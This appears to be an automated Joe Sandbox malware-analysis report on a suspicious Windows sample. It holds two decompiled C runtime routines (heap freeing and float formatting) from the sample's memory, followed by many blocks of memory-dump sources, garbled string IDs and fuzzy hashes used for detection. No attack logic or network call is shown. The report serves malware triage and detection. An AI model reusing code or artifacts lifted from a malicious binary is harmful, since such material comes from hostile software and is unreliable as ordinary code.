                                                                                                                                                                                            			E0040A989(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                            				intOrPtr* _t10;
                                                                                                                                                                                            				intOrPtr _t13;
                                                                                                                                                                                            				intOrPtr _t23;
                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                            
                                                                                                                                                                                            				_push(0xc);
                                                                                                                                                                                            				_push(0x4127c8);
                                                                                                                                                                                            				_t8 = E004082E4(__ebx, __edi, __esi);
                                                                                                                                                                                            				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                                                                                                                            				if(_t23 == 0) {
                                                                                                                                                                                            					L9:
                                                                                                                                                                                            					return E00408329(_t8);
                                                                                                                                                                                            				}
                                                                                                                                                                                            				if( *0x4386b4 != 3) {
                                                                                                                                                                                            					_push(_t23);
                                                                                                                                                                                            					L7:
                                                                                                                                                                                            					_t8 = HeapFree( *0x438074, 0, ??);
                                                                                                                                                                                            					_t31 = _t8;
                                                                                                                                                                                            					if(_t8 == 0) {
                                                                                                                                                                                            						_t10 = E00409C95(_t31);
                                                                                                                                                                                            						 *_t10 = E00409C53(GetLastError());
                                                                                                                                                                                            					}
                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				E0040A28A(__ebx, __edi, 4);
                                                                                                                                                                                            				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                                                                                                            				_t13 = E0040AED5(_t23);
                                                                                                                                                                                            				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                                                                                                                            				if(_t13 != 0) {
                                                                                                                                                                                            					_push(_t23);
                                                                                                                                                                                            					_push(_t13);
                                                                                                                                                                                            					E0040AF05();
                                                                                                                                                                                            				}
                                                                                                                                                                                            				 *(_t25 - 4) = 0xfffffffe;
                                                                                                                                                                                            				_t8 = E0040A9DF();
                                                                                                                                                                                            				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                            				} else {
                                                                                                                                                                                            					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                            				}
                                                                                                                                                                                            			}








                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __lock.LIBCMT ref: 0040A9A7
                                                                                                                                                                                              • Part of subcall function 0040A28A: __mtinitlocknum.LIBCMT ref: 0040A2A0
                                                                                                                                                                                              • Part of subcall function 0040A28A: __amsg_exit.LIBCMT ref: 0040A2AC
                                                                                                                                                                                              • Part of subcall function 0040A28A: EnterCriticalSection.KERNEL32(?,?,?,0040EB16,00000004,00412848,0000000C,0040AA72,004062E5,?,00000000,00000000,00000000,?,00407F8F,00000001), ref: 0040A2B4
                                                                                                                                                                                            • ___sbh_find_block.LIBCMT ref: 0040A9B2
                                                                                                                                                                                            • ___sbh_free_block.LIBCMT ref: 0040A9C1
                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,004062E5,004127C8,0000000C,0040A26B,00000000,00412748,0000000C,0040A2A5,004062E5,?,?,0040EB16,00000004,00412848,0000000C), ref: 0040A9F1
                                                                                                                                                                                            • GetLastError.KERNEL32(?,0040EB16,00000004,00412848,0000000C,0040AA72,004062E5,?,00000000,00000000,00000000,?,00407F8F,00000001,00000214), ref: 0040AA02
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2714421763-0
                                                                                                                                                                                            • Opcode ID: 8ee054100c25386e7e6bf49a22d9d0fe6e519841e9ea1bfdabd22a3f965e27af
                                                                                                                                                                                            • Instruction ID: e2150fc4865ee1d3db8e63113e5638ba8670b4d2d0790c28c3db45950ffd1fd9
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ee054100c25386e7e6bf49a22d9d0fe6e519841e9ea1bfdabd22a3f965e27af
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3501A771945701AADF207BB1AD0AB4F7B609F40724F11453FF504B61C1CE7C8990CA5E
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E00406DE2(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                            
                                                                                                                                                                                            				_t25 = _a16;
                                                                                                                                                                                            				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                                                                                                            					_t26 = E004066D3(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                            				} else {
                                                                                                                                                                                            					_t34 = _t25 - 0x66;
                                                                                                                                                                                            					if(_t25 != 0x66) {
                                                                                                                                                                                            						__eflags = _t25 - 0x61;
                                                                                                                                                                                            						if(_t25 == 0x61) {
                                                                                                                                                                                            							L7:
                                                                                                                                                                                            							_t26 = E004067C3(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                            						} else {
                                                                                                                                                                                            							__eflags = _t25 - 0x41;
                                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                                            								goto L7;
                                                                                                                                                                                            							} else {
                                                                                                                                                                                            								_t26 = E00406CE8(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                            							}
                                                                                                                                                                                            						}
                                                                                                                                                                                            						L9:
                                                                                                                                                                                            						return _t26;
                                                                                                                                                                                            					} else {
                                                                                                                                                                                            						return E00406C2D(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                                                                                                                            					}
                                                                                                                                                                                            				}
                                                                                                                                                                                            			}







                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3016257755-0
                                                                                                                                                                                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                            • Instruction ID: fc1663edae1a36477a36d3ec34c16c4e8e2cd2cbbf3421f7f24d220d1bd2972a
                                                                                                                                                                                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                            • Instruction Fuzzy Hash: F711553600024EBBCF125E95CC05CEE3F63BF18354B5A8426FE5969171D33AC9B1AB85
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: ,.*l$F;6k$F}Nk$tW$l$<6k$P$l$Z6k
                                                                                                                                                                                            • API String ID: 0-2376836688
                                                                                                                                                                                            • Opcode ID: f7bb5a1b116325141464cd3452b780e40d307ebe757c875ff178821f61dd0e85
                                                                                                                                                                                            • Instruction ID: ec8c972d852306c3be9b394dd62b60cda11a08ecbdaade3fc54f66949241a3db
                                                                                                                                                                                            • Opcode Fuzzy Hash: f7bb5a1b116325141464cd3452b780e40d307ebe757c875ff178821f61dd0e85
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7382A175B101294FDF79EB7C89A16BEB1D39B8A684F104879D00BDF360DF288D498792
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: |I
                                                                                                                                                                                            • API String ID: 0-777982666
                                                                                                                                                                                            • Opcode ID: d10205302e9b55eeffb7493c632f9a7f2cd4a2055bdaed16f681c5f8986af084
                                                                                                                                                                                            • Instruction ID: 2fa05ce64df98f3838440f2ad830499db5ee44ef8d7940b091d94fc87e20e02f
                                                                                                                                                                                            • Opcode Fuzzy Hash: d10205302e9b55eeffb7493c632f9a7f2cd4a2055bdaed16f681c5f8986af084
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8542DF74E012288FDB64DF64C955BEEBBB2AF89304F1095EAD40AAB350DB355E85CF40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: |I
                                                                                                                                                                                            • API String ID: 0-777982666
                                                                                                                                                                                            • Opcode ID: 11fa1974b9ccc3cb91aff199a0f31fd7c49096b121b392837e33c561bca1b8de
                                                                                                                                                                                            • Instruction ID: 51aef9c8b43a48b27c04e4f10511841ff8eeb64717f383b2e903335a14bf0b42
                                                                                                                                                                                            • Opcode Fuzzy Hash: 11fa1974b9ccc3cb91aff199a0f31fd7c49096b121b392837e33c561bca1b8de
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9CF10274A012288FDB28DF64C951BDEBBB2BF89304F1085AAD509AB351DB359E85CF50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 729284d7b0ad50a257baf136db82347fccda23b0731a148b193a84617e169c79
                                                                                                                                                                                            • Instruction ID: 1d7146b94180970d40e95f722e5e706a527553b14a09811d91704efa4daca551
                                                                                                                                                                                            • Opcode Fuzzy Hash: 729284d7b0ad50a257baf136db82347fccda23b0731a148b193a84617e169c79
                                                                                                                                                                                            • Instruction Fuzzy Hash: 21829D31B102158FDF18DF79C8946AEB7E2AF8A384F148469E406EB351DB349D46CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 22d1624825936852a4f7ff8b96ed785ee51d66cc8b42e9a4a30ed539fb7609f7
                                                                                                                                                                                            • Instruction ID: 70d56266f05dcde855ac9b86ff306103b040f047c5885807c8df4d66c0f73492
                                                                                                                                                                                            • Opcode Fuzzy Hash: 22d1624825936852a4f7ff8b96ed785ee51d66cc8b42e9a4a30ed539fb7609f7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 582206B4901228CFDB65DF24C959BD9BBB2FF4A305F0084E9D50DAB2A1CB359A85CF50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425408932.0000000009EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EF0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9ef0000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: <9$T9$l9
                                                                                                                                                                                            • API String ID: 0-1859377606
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 8cbg$Xv $n
                                                                                                                                                                                            • API String ID: 0-2224752767
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 8cbg$Xv $n
                                                                                                                                                                                            • API String ID: 0-2224752767
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425408932.0000000009EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EF0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9ef0000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: |I$|I$|I
                                                                                                                                                                                            • API String ID: 0-2977622761
                                                                                                                                                                                            • Opcode ID: ea72a0393bb5d0d47151d771f1f3e1b0b27f23462c9dfa5354023a5d25148c1d
                                                                                                                                                                                            • Instruction ID: 8a001fc058f6d37cb2db18bc9d7647066dbe814355f9c1ff9ea11a19f7af0c4b
                                                                                                                                                                                            • Opcode Fuzzy Hash: ea72a0393bb5d0d47151d771f1f3e1b0b27f23462c9dfa5354023a5d25148c1d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2731A834708249CFCB159B74C460ABE7BB6EF89204F14906BD617CB2A2DB74DC15CB52
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 4! $8\
                                                                                                                                                                                            • API String ID: 0-3741826720
                                                                                                                                                                                            • Opcode ID: 664ebe14d8c08b8fc4054fc4111babcd6938662f370d63cc33b18b3049464924
                                                                                                                                                                                            • Instruction ID: 300be6a0b6a0222dc4bf890bcca44d62c9b598a5c0b7afa4fb418e78b23a39bc
                                                                                                                                                                                            • Opcode Fuzzy Hash: 664ebe14d8c08b8fc4054fc4111babcd6938662f370d63cc33b18b3049464924
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1561D174E00218CFCB08DFB5E59899DBBB2FF89301F60856AE819AB356DB355846CF40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Xv $dx
                                                                                                                                                                                            • API String ID: 0-2217502953
                                                                                                                                                                                            • Opcode ID: b8cf2f73803e9c844821f2486e2ff98676d15e67459003009298f8139435e604
                                                                                                                                                                                            • Instruction ID: 62b2c33bbac1592ceaba54618763d27336246437f34010c592665293fc8dc4cd
                                                                                                                                                                                            • Opcode Fuzzy Hash: b8cf2f73803e9c844821f2486e2ff98676d15e67459003009298f8139435e604
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AE092313006456FCB142BAAB98CE9F7ADAEBCA215B40447DE10EC3742DA612C0587A5
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: acb56216b45116cb644a19adada12ff778fd36a7613500b449294a72398da61a
                                                                                                                                                                                            • Instruction ID: 6c12e051fc8b2d069790fcac1e18fb4da784c2a48865bcb5578e2a168f3d9528
                                                                                                                                                                                            • Opcode Fuzzy Hash: acb56216b45116cb644a19adada12ff778fd36a7613500b449294a72398da61a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 82130F38905208EFCB169B60D7949D9B772FF5930AB1488AFDC1136B56CB3B8992DF01
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: db32234b3708855e9669e8f6d8ece34e5653b65da0a3b0409ae62709b794aaa6
                                                                                                                                                                                            • Instruction ID: a55daea65c3f287804665e55a3cd21a9aaf6e0f3f08ef27c95c9400c9d3ac1e3
                                                                                                                                                                                            • Opcode Fuzzy Hash: db32234b3708855e9669e8f6d8ece34e5653b65da0a3b0409ae62709b794aaa6
                                                                                                                                                                                            • Instruction Fuzzy Hash: F6130F38905208EFCB169B60D7949D9B732FF5930AB1488AFDC1136B56CB3B9992DF01
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 7k
                                                                                                                                                                                            • API String ID: 0-1500864370
                                                                                                                                                                                            • Opcode ID: 0f8bd12a57250c71c6118c0fd9a86775c81c544eed519b03a63bddaf4adfb2da
                                                                                                                                                                                            • Instruction ID: f7569ac2b6cc74058de74e1281edb1b412a408775a0a5ed6f2660b680425bfcf
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f8bd12a57250c71c6118c0fd9a86775c81c544eed519b03a63bddaf4adfb2da
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6DF1AE74B0120ADFDB14DF64E598AADBBB2FF88315F008469E41A9B365DB30EC41CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: ci
                                                                                                                                                                                            • API String ID: 0-2660201732
                                                                                                                                                                                            • Opcode ID: cab0bfdfdb4be38218705f2147fb2a02bfb4eb4a268c9dc6aa65de3439c4354b
                                                                                                                                                                                            • Instruction ID: 4ea721672e1b969747a91e3b54f1ec4dc50bb4a49a24bb4703add2f8aebd4b22
                                                                                                                                                                                            • Opcode Fuzzy Hash: cab0bfdfdb4be38218705f2147fb2a02bfb4eb4a268c9dc6aa65de3439c4354b
                                                                                                                                                                                            • Instruction Fuzzy Hash: E9D1C274E012288FDB64DF74C994B9DBBB2BF89304F2095AAD409AB391DB345E85CF50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425408932.0000000009EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EF0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9ef0000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 03be4de496d23470baf655bd92240be42f846032e8e7173d6f416f8ea262c8a5
                                                                                                                                                                                            • Instruction ID: 74387e4bdd6fb88e2b0647687876dbc57a5f370c29118940551cb381a72793f4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 03be4de496d23470baf655bd92240be42f846032e8e7173d6f416f8ea262c8a5
                                                                                                                                                                                            • Instruction Fuzzy Hash: CAC29E74B001189FDB14DF64C895EEDBBB6EF88704F1080AAE61A9B7A1CB319D85CF51
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 7k
                                                                                                                                                                                            • API String ID: 0-1500864370
                                                                                                                                                                                            • Opcode ID: 0cf51ac2517f9904d0614ec0eafffbaaf438559b63554a7e1512321b702df492
                                                                                                                                                                                            • Instruction ID: 4893158cde91882f42a7b44058ba13595d656e3c3f21eccde7487aff66237611
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cf51ac2517f9904d0614ec0eafffbaaf438559b63554a7e1512321b702df492
